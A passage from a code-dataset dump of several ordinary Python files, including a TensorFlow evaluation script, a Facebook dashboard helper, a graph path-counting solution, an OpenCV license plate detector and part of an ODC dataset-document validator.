debug=True)","sub_path":"helloworld/tutorial1/helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"174857125","text":"\nfrom __future__ import print_function\nimport numpy as np\nimport tensorflow as tf\nimport argparse\nimport importlib\nimport os\nfrom datetime import datetime\nimport json\nimport glob\nimport itk\nimport sys\nimport csv\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve, auc\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport itertools\nfrom scipy import interp\n\n\nprint(\"Tensorflow version:\", tf.__version__)\n\nparser = argparse.ArgumentParser(description='Model 
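# --- Added caveat on the option definitions just below: argparse's type=bool
# does not parse booleans -- bool('False') is True, so '--translate_label False'
# still enables the option. The usual fix is a store_true flag, e.g.:
import argparse

_p = argparse.ArgumentParser()
_p.add_argument('--translate_label', action='store_true',
                help='Builds translation table from the two json files')
assert _p.parse_args([]).translate_label is False
assert _p.parse_args(['--translate_label']).translate_label is True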
evaluation', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('--json_tf', type=str, help='JSON file generated by tfRecords.py. Used to evaluate the model.', required=True)\nparser.add_argument('--json', type=str, help='JSON file with model description, created by train.py', required=True)\nparser.add_argument('--translate_label', type=bool, help='Builds translation table from the two json files. Only for classification evaluation and when ground truth differs from model prediction', default=False)\nparser.add_argument('--ps_device', help='Process device', type=str, default='/cpu:0')\nparser.add_argument('--w_device', help='Worker device', type=str, default='/cpu:0')\n\nargs = parser.parse_args()\n\njson_model_name = args.json\njson_tf_records = args.json_tf\n\nps_device = args.ps_device\nw_device = args.w_device\nclass_names = []\nwith open(json_model_name, \"r\") as f:\n model_description = json.load(f)\n model_name = os.path.join(os.path.dirname(json_model_name), model_description[\"model\"])\n neural_network = model_description[\"nn\"]\n if(\"description\" in model_description and \"enumerate\" in model_description[\"description\"]):\n class_dict = model_description[\"description\"][model_description[\"description\"][\"enumerate\"]][\"class\"]\n class_obj = {}\n for key in class_dict:\n class_obj[class_dict[key]] = key\n class_names = class_obj.values()\n\nprint('json', json_model_name)\nprint('json_tf', json_tf_records)\nprint('model_name', model_name)\nprint('neural_network', neural_network)\n\nprint('ps_device', ps_device)\nprint('w_device', w_device)\n\nnn = importlib.import_module(\"nn.\" + neural_network).NN()\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n if(model_description[\"batch_size\"]):\n batch_size = model_description[\"batch_size\"]\n else: \n batch_size = 1\n\n if(model_description[\"buffer_size\"]):\n buffer_size = model_description[\"buffer_size\"]\n else: \n buffer_size = 100\n\n nn.set_data_description(json_filename=json_tf_records)\n iterator = nn.inputs(batch_size=batch_size,\n num_epochs=1, \n buffer_size=buffer_size)\n\n data_tuple = iterator.get_next()\n\n y_conv = nn.inference(data_tuple=data_tuple, keep_prob=1.0, is_training=False, ps_device=ps_device, w_device=w_device)\n metrics_eval = nn.metrics(y_conv, data_tuple)\n y_conv = nn.predict(y_conv)\n summary_op = tf.summary.merge_all()\n\n with tf.Session() as sess:\n\n sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\n saver = tf.train.Saver()\n saver.restore(sess, model_name)\n\n summary_path = model_name + \"-eval\"\n summary_writer = tf.summary.FileWriter(summary_path, sess.graph)\n\n print(\"I am self aware!\")\n\n sess.run([iterator.initializer])\n\n step = 0 \n\n y_pred_arr = []\n y_true_arr = []\n\n fpr_arr = []\n tpr_arr = []\n roc_auc_arr = []\n iou_arr = []\n\n abs_diff_arr = []\n mse_arr = []\n\n while True:\n try:\n\n y_pred, data_t, summary, metrics = sess.run([y_conv, data_tuple, summary_op, metrics_eval])\n\n # output some data to the log files for tensorboard\n summary_writer.add_summary(summary, step)\n summary_writer.flush()\n\n metrics_str = '|'\n\n for metric in metrics:\n metrics_str += \" %s = %.3f |\" % (metric, metrics[metric][0])\n\n print(metrics_str)\n\n if(nn.prediction_type() == \"class\"):\n y_pred_arr.extend(np.argmax(np.array(y_pred), axis=1))\n y_true_arr.extend(np.reshape(data_t[1], -1).tolist())\n elif(nn.prediction_type() == \"segmentation\"):\n fpr, tpr, _ = roc_curve(np.array(data_t[1]).reshape(-1), 
np.array(y_pred).reshape(-1), pos_label=1)\n roc_auc = auc(fpr,tpr)\n\n fpr_arr.append(fpr)\n tpr_arr.append(tpr)\n roc_auc_arr.append(roc_auc)\n\n y_pred_flat = np.array(y_pred).reshape((len(y_pred), -1))\n labels_flat = np.array(data_t[1]).reshape((len(y_pred), -1))\n\n for i in range(len(y_pred)):\n intersection = 2.0 * np.sum(y_pred_flat[i] * labels_flat[i]) + 1e-7\n union = np.sum(y_pred_flat[i]) + np.sum(labels_flat[i]) + 1e-7\n iou_arr.append(intersection/union)\n\n elif(nn.prediction_type() == \"image\"):\n\n abs_diff_arr.extend(np.average(np.absolute(y_pred - data_t[1]).reshape([batch_size, -1]), axis=-1))\n mse_arr.extend(np.average(np.square(y_pred - data_t[1]).reshape([batch_size, -1]), axis=-1))\n \n\n step += 1\n\n except tf.errors.OutOfRangeError:\n break\n\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.3f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\")\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.tight_layout()\n\nif(nn.prediction_type() == \"class\"):\n # Compute confusion matrix\n\n cnf_matrix = confusion_matrix(y_true_arr, y_pred_arr)\n np.set_printoptions(precision=3)\n\n # Plot non-normalized confusion matrix\n fig = plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, title='Confusion matrix, without normalization')\n confusion_filename = os.path.splitext(json_tf_records)[0] + \"_confusion.png\"\n fig.savefig(confusion_filename)\n # Plot normalized confusion matrix\n fig2 = plt.figure()\n plot_confusion_matrix(cnf_matrix, classes=class_names, normalize=True, title='Normalized confusion matrix')\n\n norm_confusion_filename = os.path.splitext(json_tf_records)[0] + \"_norm_confusion.png\"\n fig2.savefig(norm_confusion_filename)\n\nelif(nn.prediction_type() == \"segmentation\"):\n\n # First aggregate all false positive rates\n all_fpr = np.unique(np.concatenate([fpr for fpr in fpr_arr]))\n\n # Then interpolate all ROC curves at this points\n mean_tpr = np.zeros_like(all_fpr)\n for i in range(len(fpr_arr)):\n mean_tpr += interp(all_fpr, fpr_arr[i], tpr_arr[i])\n\n mean_tpr /= len(fpr_arr)\n\n roc_auc = auc(all_fpr, mean_tpr)\n\n roc_fig = plt.figure()\n lw = 1\n plt.plot(all_fpr, mean_tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc)\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n\n roc_filename = os.path.splitext(json_tf_records)[0] + \"_roc.png\"\n roc_fig.savefig(roc_filename)\n\n iou_obj = {}\n iou_obj[\"iou\"] = iou_arr\n\n iou_json = os.path.splitext(json_tf_records)[0] + 
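# --- Added note: the per-sample "iou" computed above is actually the Dice
# coefficient, 2|A.B| / (|A| + |B|); true intersection-over-union does not
# double the overlap and subtracts it from the denominator. A sketch of both:
import numpy as np

def dice(pred, label, eps=1e-7):
    inter = np.sum(pred * label)
    return (2.0 * inter + eps) / (np.sum(pred) + np.sum(label) + eps)

def iou(pred, label, eps=1e-7):
    inter = np.sum(pred * label)
    return (inter + eps) / (np.sum(pred) + np.sum(label) - inter + eps)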
\"_iou_arr.json\"\n\n with open(iou_json, \"w\") as f:\n f.write(json.dumps(iou_obj))\n\n iou_fig_polar = plt.figure()\n ax = iou_fig_polar.add_subplot(111, projection='polar')\n theta = 2 * np.pi * np.arange(len(iou_arr))/len(iou_arr)\n colors = iou_arr\n ax.scatter(theta, iou_arr, c=colors, cmap='autumn', alpha=0.75)\n ax.set_rlim(0,1)\n plt.title('Intersection over union')\n locs, labels = plt.xticks()\n plt.xticks(locs, np.arange(0, len(iou_arr), round(len(iou_arr)/len(locs))))\n\n iou_polar_filename = os.path.splitext(json_tf_records)[0] + \"_iou_polar.png\"\n iou_fig_polar.savefig(iou_polar_filename)\n\n iou_fig = plt.figure()\n x_samples = np.arange(len(iou_arr))\n plt.scatter(x_samples, iou_arr, c=colors, cmap='autumn', alpha=0.75)\n plt.title('Intersection over union')\n iou_mean = np.mean(iou_arr)\n plt.plot(x_samples,[iou_mean]*len(iou_arr), label='Mean', linestyle='--')\n plt.text(len(iou_arr) + 2,iou_mean, '%.3f'%iou_mean)\n iou_stdev = np.std(iou_arr)\n stdev_line = plt.plot(x_samples,iou_mean + [iou_stdev]*len(iou_arr), label='Stdev', linestyle=':', alpha=0.75)\n stdev_line = plt.plot(x_samples,iou_mean - [iou_stdev]*len(iou_arr), label='Stdev', linestyle=':', alpha=0.75)\n plt.text(len(iou_arr) + 2,iou_mean + iou_stdev, '%.3f'%iou_stdev, alpha=0.75, fontsize='x-small')\n iou_filename = os.path.splitext(json_tf_records)[0] + \"_iou.png\"\n iou_fig.savefig(iou_filename)\n\nelif(nn.prediction_type() == \"image\"):\n abs_diff_arr = np.array(abs_diff_arr)\n abs_diff_fig = plt.figure()\n x_samples = np.arange(len(abs_diff_arr))\n plt.scatter(x_samples, abs_diff_arr, c=abs_diff_arr, cmap='cool', alpha=0.75, label='Mean absolute error')\n plt.xlabel('Samples')\n plt.ylabel('Absolute error')\n plt.title('Mean absolute error')\n\n abs_filename = os.path.splitext(json_tf_records)[0] + \"_abs_diff.png\"\n abs_diff_fig.savefig(abs_filename)\n\n mse_arr = np.array(mse_arr)\n mse_fig = plt.figure()\n plt.scatter(x_samples, mse_arr, c=mse_arr, cmap='cool', alpha=0.75, label='MSE')\n plt.xlabel('Samples')\n plt.ylabel('MSE')\n plt.title('Mean squared error')\n\n mse_filename = os.path.splitext(json_tf_records)[0] + \"_mse.png\"\n mse_fig.savefig(mse_filename)\n","sub_path":"src/py/dl/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":10021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"262732187","text":"#!/usr/bin/env python\n#\n\n\"\"\"A Facebook application that uses AppEngine for user testimonials.\"\"\"\n\n\"\"\"Notifications Handler class\"\"\"\n\nimport urllib\nimport mytypes\nimport fbUtils\n\nclass DashboardError(Exception):\n def __init__(self, type, message):\n Exception.__init__(self, message)\n self.type = type\n \nclass Dashboard(object):\n def __init__(self, user, settings=None):\n self.user = user\n self.settings = settings\n \n def setCount(self, count=None):\n args = dict(uid = self.user.id) \n if not count:\n # Reset count\n args[\"count\"] = 0\n else:\n args[\"count\"] = count\n response = fbUtils.call_rest_api(self.user, 'dashboard.setCount', args)\n \n if response is False:\n raise DashboardError('DashboardError',\n 'setCount failed') \n return response\n\n","sub_path":"src/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"74660496","text":"import sys\nsys.setrecursionlimit(10**6)\nmod = (int)(1e9+7)\nn,m = map(int,input().split())\n\ng = [[] for _ in 
range(n+1)]\n\nc = [-1]*(n+1)\n\nfor _ in range(m):\n a,b = map(int,input().split())\n g[a].append(b)\n\ndef dfs(node):\n if node == n:\n return 1\n if c[node] !=-1:\n return c[node]\n cnt = 0\n for child in g[node]:\n cnt += dfs(child)\n c[node] = cnt%mod\n return c[node]\n\ndfs(1)\nprint(c[1])","sub_path":"Graph Algorithms/Game Routes/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260882587","text":"import cv2\nimport numpy as np\nimport imutils as im\nimport pytesseract\nfrom PIL import Image\n\n# Specifying the Path\ninput1 = 'car4.jpg'\n\n# Reading the Image\nimg = cv2.imread(input1)\n\n# Resizing the image to Standard Size\nnewwidth = 500\nimg = im.resize(img, width=newwidth)\n\n# Converting the image to grayscale\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# Image Smoothing\nd, sigmaColor, sigmaSpace = 10, 15, 15\nflitered_img = cv2.bilateralFilter(gray, d, sigmaColor, sigmaSpace)\n\n# Canny Edge Detection\n# If intensity of pixel is greater than the upper threshold then pixel is accepted\n# If intensity of pixel is less than the lower threshold then pixel is rejected\n# If intensity of pixel is between lower threshold and upper threshold then pixel is accepted, only of it is connected to upper threshold\nlower, upper = 170, 200\nedged = cv2.Canny(flitered_img, lower, upper)\n\n# Finding Contours\ncontour, hierarchy = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n# Sorting contours according to there area\ncontour = sorted(contour, key=cv2.contourArea, reverse=True)[:10]\nprint('Number of Contours found: ' + str(len(contour)))\n\n# Iterating through all the contours\ncount = 0\nfor c in contour:\n perimeter = cv2.arcLength(c, True)\n epsilon = 0.01 * perimeter # Epsilon is basically the maximum distance from contour to approximated contour. It is an accuracy parameter.\n # This function below is used to find the approximate shape. Eg. 
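# --- Added note on the Game Routes solution above: it relies on
# sys.setrecursionlimit for deep graphs. An equivalent iterative sketch that
# processes vertices in topological order (Kahn's algorithm), reusing the
# same n, g and mod as defined there:
from collections import deque

def count_routes(n, g, mod):
    indeg = [0] * (n + 1)
    for u in range(1, n + 1):
        for v in g[u]:
            indeg[v] += 1
    ways = [0] * (n + 1)
    ways[1] = 1                      # one way to stand at the start
    queue = deque(u for u in range(1, n + 1) if indeg[u] == 0)
    while queue:
        u = queue.popleft()
        for v in g[u]:
            ways[v] = (ways[v] + ways[u]) % mod
            indeg[v] -= 1
            if indeg[v] == 0:
                queue.append(v)
    return ways[n]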
If we want to find a square but we are not getting it so by using this func we can find the approx shape as of the square.\n approx = cv2.approxPolyDP(c, epsilon, True)\n if len(approx) == 4: # If approx has 4 corners\n print(approx)\n NumberPlateContour = approx\n count = 1\n break\n\nif count == 0:\n print('No License Plate Detected')\nelse:\n # Drawing all contours\n cv2.drawContours(img, [NumberPlateContour], -1, (0, 255, 0), 2)\n\n# # Now as the remaining image is not useful for us so we will mask that image\n# mask = np.zeros(gray.shape, np.uint8)\n# new_image = cv2.drawContours(mask, [NumberPlateContour], 0, 255, -1)\n# new_image = cv2.bitwise_and(img, img, mask=mask)\n#\n# # Now cropping this number plate from the masked image and recognising character from it using raspberry-pi\n# # Now Crop\n# (x, y) = np.where(mask == 255)\n# (topx, topy) = (np.min(x), np.min(y))\n# (bottomx, bottomy) = (np.max(x), np.max(y))\n# cropped = gray[topx:bottomx+1, topy:bottomy+1]\n#\n# # Now Character recognition using pytesseract it is a google based OCR\n# text = pytesseract.image_to_string(cropped, config='--psm 11')\n# print('Detected number on the License Plate is: ' + text)\n\ncv2.imshow('Result', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"License Plate Detection/detectLicensePlate.py","file_name":"detectLicensePlate.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"25396531","text":"\"\"\"\nValidate ODC dataset documents\n\"\"\"\nimport collections\nimport enum\nimport math\nimport multiprocessing\nimport os\nimport sys\nfrom datetime import datetime\nfrom functools import partial\nfrom pathlib import Path\nfrom textwrap import indent\nfrom typing import (\n Counter,\n Dict,\n Generator,\n Iterable,\n List,\n Optional,\n Sequence,\n Set,\n Tuple,\n Union,\n)\nfrom urllib.parse import urljoin, urlparse\nfrom urllib.request import urlopen\n\nimport attr\nimport ciso8601\nimport click\nimport numpy as np\nimport rasterio\nimport toolz\nfrom boltons.iterutils import get_path\nfrom click import echo, secho, style\nfrom datacube import Datacube\nfrom datacube.index.eo3 import prep_eo3\nfrom datacube.utils import InvalidDocException, changes, is_url, read_documents\nfrom datacube.utils.documents import load_documents\nfrom rasterio import DatasetReader\nfrom rasterio.crs import CRS\nfrom rasterio.errors import CRSError\nfrom shapely.validation import explain_validity\n\nfrom eodatasets3 import model, serialise, utils\nfrom eodatasets3.model import DatasetDoc\nfrom eodatasets3.ui import bool_style, is_absolute, uri_resolve\nfrom eodatasets3.utils import EO3_SCHEMA, default_utc\n\n\nclass Level(enum.Enum):\n info = 1\n warning = 2\n error = 3\n\n\nclass DocKind(enum.Enum):\n # EO3 datacube dataset.\n dataset = 1\n # Datacube product\n product = 2\n # Datacube Metadata Type\n metadata_type = 3\n # Stac Item\n stac_item = 4\n # Legacy datacube (\"eo1\") dataset\n legacy_dataset = 5\n # Legacy product config for ingester\n ingestion_config = 6\n\n\n# What kind of document each suffix represents.\n# (full suffix will also have a doc type: .yaml, .json, .yaml.gz etc)\n# Example: \"my-test-dataset.odc-metadata.yaml\"\nSUFFIX_KINDS = {\n \".odc-metadata\": DocKind.dataset,\n \".odc-product\": DocKind.product,\n \".odc-type\": DocKind.metadata_type,\n}\n# Inverse of above\nDOC_TYPE_SUFFIXES = {v: k for k, v in SUFFIX_KINDS.items()}\n\n\ndef filename_doc_kind(path: Union[str, Path]) -> 
Optional[\"DocKind\"]:\n \"\"\"\n Get the expected file type for the given filename.\n\n Returns None if it does not follow any naming conventions.\n\n >>> filename_doc_kind('LC8_2014.odc-metadata.yaml').name\n 'dataset'\n >>> filename_doc_kind('/tmp/something/water_bodies.odc-metadata.yaml.gz').name\n 'dataset'\n >>> filename_doc_kind(Path('/tmp/something/ls8_fc.odc-product.yaml')).name\n 'product'\n >>> filename_doc_kind(Path('/tmp/something/ls8_wo.odc-product.json.gz')).name\n 'product'\n >>> filename_doc_kind(Path('/tmp/something/eo3_gqa.odc-type.yaml')).name\n 'metadata_type'\n >>> filename_doc_kind(Path('/tmp/something/some_other_file.yaml'))\n \"\"\"\n\n for suffix in reversed(Path(path).suffixes):\n suffix = suffix.lower()\n if suffix in SUFFIX_KINDS:\n return SUFFIX_KINDS[suffix]\n\n return None\n\n\ndef guess_kind_from_contents(doc: Dict):\n \"\"\"\n What sort of document do the contents look like?\n \"\"\"\n if \"$schema\" in doc and doc[\"$schema\"] == EO3_SCHEMA:\n return DocKind.dataset\n if \"metadata_type\" in doc:\n if \"source_type\" in doc:\n return DocKind.ingestion_config\n return DocKind.product\n if (\"dataset\" in doc) and (\"search_fields\" in doc[\"dataset\"]):\n return DocKind.metadata_type\n if \"id\" in doc:\n if (\"lineage\" in doc) and (\"platform\" in doc):\n return DocKind.legacy_dataset\n\n if (\"properties\" in doc) and (\"datetime\" in doc[\"properties\"]):\n return DocKind.stac_item\n\n return None\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass ValidationMessage:\n level: Level\n code: str\n reason: str\n hint: str = None\n\n def __str__(self) -> str:\n hint = \"\"\n if self.hint:\n hint = f\" (Hint: {self.hint})\"\n return f\"{self.code}: {self.reason}{hint}\"\n\n\ndef _info(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.info, code, reason, hint=hint)\n\n\ndef _warning(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.warning, code, reason, hint=hint)\n\n\ndef _error(code: str, reason: str, hint: str = None):\n return ValidationMessage(Level.error, code, reason, hint=hint)\n\n\nValidationMessages = Generator[ValidationMessage, None, None]\n\n\ndef validate_dataset(\n doc: Dict,\n product_definition: Optional[Dict] = None,\n metadata_type_definition: Optional[Dict] = None,\n thorough: bool = False,\n readable_location: Union[str, Path] = None,\n expect_extra_measurements: bool = False,\n expect_geometry: bool = True,\n nullable_fields: Iterable[str] = (\"label\",),\n) -> ValidationMessages:\n \"\"\"\n Validate a a dataset document, optionally against the given product.\n\n By default this will only look at the metadata, run with thorough=True to\n open the data files too.\n\n :param product_definition: Optionally check that the dataset matches this product definition.\n :param thorough: Open the imagery too, to check that data types etc match.\n :param readable_location: Dataset location to use, if not the metadata path.\n :param expect_extra_measurements:\n Allow some dataset measurements to be missing from the product definition.\n This is (deliberately) allowed by ODC, but often a mistake.\n This flag disables the warning.\n \"\"\"\n schema = doc.get(\"$schema\")\n if schema is None:\n yield _error(\n \"no_schema\",\n f\"No $schema field. \"\n f\"You probably want an ODC dataset schema {model.ODC_DATASET_SCHEMA_URL!r}\",\n )\n return\n if schema != model.ODC_DATASET_SCHEMA_URL:\n yield _error(\n \"unknown_doc_type\",\n f\"Unknown doc schema {schema!r}. 
Only ODC datasets are supported ({model.ODC_DATASET_SCHEMA_URL!r})\",\n )\n return\n\n has_doc_errors = False\n for error in serialise.DATASET_SCHEMA.iter_errors(doc):\n has_doc_errors = True\n displayable_path = \".\".join(error.absolute_path)\n\n hint = None\n if displayable_path == \"crs\" and \"not of type\" in error.message:\n hint = \"epsg codes should be prefixed with 'epsg:1234'\"\n\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"structure\", f\"{context}{error.message} \", hint=hint)\n\n if has_doc_errors:\n return\n\n dataset = serialise.from_doc(doc, skip_validation=True)\n\n if not dataset.product.href:\n _info(\"product_href\", \"A url (href) is recommended for products\")\n\n yield from _validate_geo(dataset, expect_geometry=expect_geometry)\n\n # Note that a dataset may have no measurements (eg. telemetry data).\n # (TODO: a stricter mode for when we know we should have geo and measurement info)\n if dataset.measurements:\n for name, measurement in dataset.measurements.items():\n grid_name = measurement.grid\n if grid_name != \"default\" or dataset.grids:\n if grid_name not in dataset.grids:\n yield _error(\n \"invalid_grid_ref\",\n f\"Measurement {name!r} refers to unknown grid {grid_name!r}\",\n )\n\n if is_absolute(measurement.path):\n yield _warning(\n \"absolute_path\",\n f\"measurement {name!r} has an absolute path: {measurement.path!r}\",\n )\n\n yield from _validate_stac_properties(dataset)\n\n required_measurements: Dict[str, ExpectedMeasurement] = {}\n if product_definition is not None:\n required_measurements.update(\n {\n m.name: m\n for m in map(\n ExpectedMeasurement.from_definition,\n product_definition.get(\"measurements\") or (),\n )\n }\n )\n\n product_name = product_definition.get(\"name\")\n if product_name != dataset.product.name:\n # This is only informational as it's possible products may be indexed with finer-grained\n # categories than the original datasets: eg. a separate \"nrt\" product, or test product.\n yield _info(\n \"product_mismatch\",\n f\"Dataset product name {dataset.product.name!r} \"\n f\"does not match the given product ({product_name!r}\",\n )\n\n for name in required_measurements:\n if name not in dataset.measurements.keys():\n yield _error(\n \"missing_measurement\",\n f\"Product {product_name} expects a measurement {name!r})\",\n )\n measurements_not_in_product = set(dataset.measurements.keys()).difference(\n {m[\"name\"] for m in product_definition.get(\"measurements\") or ()}\n )\n if (not expect_extra_measurements) and measurements_not_in_product:\n things = \", \".join(sorted(measurements_not_in_product))\n yield _warning(\n \"extra_measurements\",\n f\"Dataset has measurements not present in product definition for {product_name!r}: {things}\",\n hint=\"This may be valid, as it's allowed by ODC. 
Set `expect_extra_measurements` to mute this.\",\n )\n\n if metadata_type_definition:\n # Datacube does certain transforms on an eo3 doc before storage.\n # We need to do the same, as the fields will be read from the storage.\n prepared_doc = prep_eo3(doc)\n\n for field_name, offsets in _get_field_offsets(\n metadata_type=metadata_type_definition\n ):\n if not any(_has_offset(prepared_doc, offset) for offset in offsets):\n readable_offsets = \" or \".join(\"->\".join(offset) for offset in offsets)\n yield _warning(\n \"missing_field\",\n f\"Dataset is missing field {field_name!r}\",\n hint=f\"Expected at {readable_offsets}\",\n )\n continue\n\n if field_name not in nullable_fields:\n value = None\n for offset in offsets:\n value = toolz.get_in(offset, prepared_doc)\n if value is None:\n yield _info(\n \"null_field\",\n f\"Value is null for configured field {field_name!r}\",\n )\n\n dataset_location = dataset.locations[0] if dataset.locations else readable_location\n\n # If we have a location:\n # For each measurement, try to load it.\n # If loadable:\n if thorough:\n for name, measurement in dataset.measurements.items():\n full_path = uri_resolve(dataset_location, measurement.path)\n expected_measurement = required_measurements.get(name)\n\n band = measurement.band or 1\n with rasterio.open(full_path) as ds:\n ds: DatasetReader\n\n if band not in ds.indexes:\n yield _error(\n \"incorrect_band\",\n f\"Measurement {name!r} file contains no rio index {band!r}.\",\n hint=f\"contains indexes {ds.indexes!r}\",\n )\n continue\n\n if not expected_measurement:\n # The measurement is not in the product definition\n #\n # This is only informational because a product doesn't have to define all\n # measurements that the datasets contain.\n #\n # This is historically because dataset documents reflect the measurements that\n # are stored on disk, which can differ. 
But products define the set of measurments\n # that are mandatory in every dataset.\n #\n # (datasets differ when, for example, sensors go offline, or when there's on-disk\n # measurements like panchromatic that GA doesn't want in their product definitions)\n if required_measurements:\n yield _info(\n \"unspecified_measurement\",\n f\"Measurement {name} is not in the product\",\n )\n else:\n expected_dtype = expected_measurement.dtype\n band_dtype = ds.dtypes[band - 1]\n # TODO: NaN handling\n if expected_dtype != band_dtype:\n yield _error(\n \"different_dtype\",\n f\"{name} dtype: \"\n f\"product {expected_dtype!r} != dataset {band_dtype!r}\",\n )\n\n ds_nodata = ds.nodatavals[band - 1]\n\n # If the dataset is missing 'nodata', we can allow anything in product 'nodata'.\n # (In ODC, nodata might be a fill value for loading data.)\n if ds_nodata is None:\n continue\n\n # Otherwise check that nodata matches.\n expected_nodata = expected_measurement.nodata\n if expected_nodata != ds_nodata and not (\n _is_nan(expected_nodata) and _is_nan(ds_nodata)\n ):\n yield _error(\n \"different_nodata\",\n f\"{name} nodata: \"\n f\"product {expected_nodata !r} != dataset {ds_nodata !r}\",\n )\n\n\ndef _has_offset(doc: Dict, offset: List[str]) -> bool:\n \"\"\"\n Is the given offset present in the document?\n \"\"\"\n for key in offset:\n if key not in doc:\n return False\n doc = doc[key]\n return True\n\n\ndef validate_product(doc: Dict) -> ValidationMessages:\n \"\"\"\n Check for common product mistakes\n \"\"\"\n\n # Validate it against ODC's product schema.\n has_doc_errors = False\n for error in serialise.PRODUCT_SCHEMA.iter_errors(doc):\n has_doc_errors = True\n displayable_path = \".\".join(map(str, error.absolute_path))\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"document_schema\", f\"{context}{error.message} \")\n\n # The jsonschema error message for this (common error) is garbage. Make it clearer.\n measurements = doc.get(\"measurements\")\n if (measurements is not None) and not isinstance(measurements, Sequence):\n yield _error(\n \"measurements_list\",\n f\"Product measurements should be a list/sequence \"\n f\"(Found a {type(measurements).__name__!r}).\",\n )\n\n # There's no point checking further if the core doc structure is wrong.\n if has_doc_errors:\n return\n\n if not doc.get(\"license\", \"\").strip():\n yield _warning(\n \"no_license\",\n f\"Product {doc['name']!r} has no license field\",\n hint='Eg. \"CC-BY-4.0\" (SPDX format), \"various\" or \"proprietary\"',\n )\n\n # Check measurement name clashes etc.\n if measurements is None:\n # Products don't have to have measurements. (eg. 
provenance-only products)\n ...\n else:\n seen_names_and_aliases = collections.defaultdict(list)\n for measurement in measurements:\n measurement_name = measurement.get(\"name\")\n dtype = measurement.get(\"dtype\")\n nodata = measurement.get(\"nodata\")\n if not numpy_value_fits_dtype(nodata, dtype):\n yield _error(\n \"unsuitable_nodata\",\n f\"Measurement {measurement_name!r} nodata {nodata!r} does not fit a {dtype!r}\",\n )\n\n # Were any of the names seen in other measurements?\n these_names = measurement_name, *measurement.get(\"aliases\", ())\n for new_field_name in these_names:\n measurements_with_this_name = seen_names_and_aliases[new_field_name]\n if measurements_with_this_name:\n seen_in = \" and \".join(\n repr(s)\n for s in ([measurement_name] + measurements_with_this_name)\n )\n\n # If the same name is used by different measurements, its a hard error.\n yield _error(\n \"duplicate_measurement_name\",\n f\"Name {new_field_name!r} is used by multiple measurements\",\n hint=f\"It's duplicated in an alias. \"\n f\"Seen in measurement(s) {seen_in}\",\n )\n\n # Are any names duplicated within the one measurement? (not an error, but info)\n for duplicate_name in _find_duplicates(these_names):\n yield _info(\n \"duplicate_alias_name\",\n f\"Measurement {measurement_name!r} has a duplicate alias named {duplicate_name!r}\",\n )\n\n for field in these_names:\n seen_names_and_aliases[field].append(measurement_name)\n\n\ndef validate_metadata_type(doc: Dict) -> ValidationMessages:\n \"\"\"\n Check for common metadata-type mistakes\n \"\"\"\n\n # Validate it against ODC's schema (there will be refused by ODC otherwise)\n for error in serialise.METADATA_TYPE_SCHEMA.iter_errors(doc):\n displayable_path = \".\".join(map(str, error.absolute_path))\n context = f\"({displayable_path}) \" if displayable_path else \"\"\n yield _error(\"document_schema\", f\"{context}{error.message} \")\n\n\ndef _find_duplicates(values: Iterable[str]) -> Generator[str, None, None]:\n \"\"\"Return any duplicate values in the given sequence\n\n >>> list(_find_duplicates(('a', 'b', 'c')))\n []\n >>> list(_find_duplicates(('a', 'b', 'b')))\n ['b']\n >>> list(_find_duplicates(('a', 'b', 'b', 'a')))\n ['a', 'b']\n \"\"\"\n previous = None\n for v in sorted(values):\n if v == previous:\n yield v\n previous = v\n\n\ndef numpy_value_fits_dtype(value, dtype):\n \"\"\"\n Can the value be exactly represented by the given numpy dtype?\n\n >>> numpy_value_fits_dtype(3, 'uint8')\n True\n >>> numpy_value_fits_dtype(3, np.dtype('uint8'))\n True\n 